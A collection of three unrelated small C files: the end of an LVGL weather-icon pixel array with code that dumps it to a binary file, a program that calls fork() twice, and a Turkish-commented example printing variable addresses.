0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, #endif }; const lv_img_dsc_t owm_50d_64px = { .header.always_zero = 0, .header.w = 64, .header.h = 64, .data_size = 4096 * LV_IMG_PX_SIZE_ALPHA_BYTE, .header.cf = LV_IMG_CF_TRUE_COLOR_ALPHA, .data = owm_50d_64px_map, }; /* * writing the pixel map */ int main(int argc, char **argv) { FILE *fp; char *binFile; binFile="owm_50d_64px_argb8888.bin"; /* 32 bit color */ fp = fopen(binFile, "wb"); fwrite(owm_50d_64px_map,owm_50d_64px.data_size,1,fp); fclose(fp); }
the_stack_data/460161.c
#include <unistd.h> int main(void) { fork(); fork(); return 0; }
the_stack_data/25137113.c
#include <stdio.h> int main(void) { /* Adres dediğimiz değer, bir değişkenin bellekte nerede tutulduğunu gösteren değerdir. Bir değişken, eğer register sınıfı kullanılmadıysa bellekte boş bir yerde saklanır. Bizler de bu adrese erişmek için (&) operatörünü kullanırız. Mesela integer tipinden bir a değişkenimiz olsun. Bu a değişkenimiz 2424'te saklansın. Eğer biz printf("%p", &a); yazarsak bize 2424 verecektir. Yani a değişkenimizin yerini verdi. */ int a = 20; int b = 123; printf("a: %p\n", &a); /* %p operatörü, sistem mimarisine göre adresi formatlamak için kullanılır. */ printf("b: %p\n", &b); return 0; }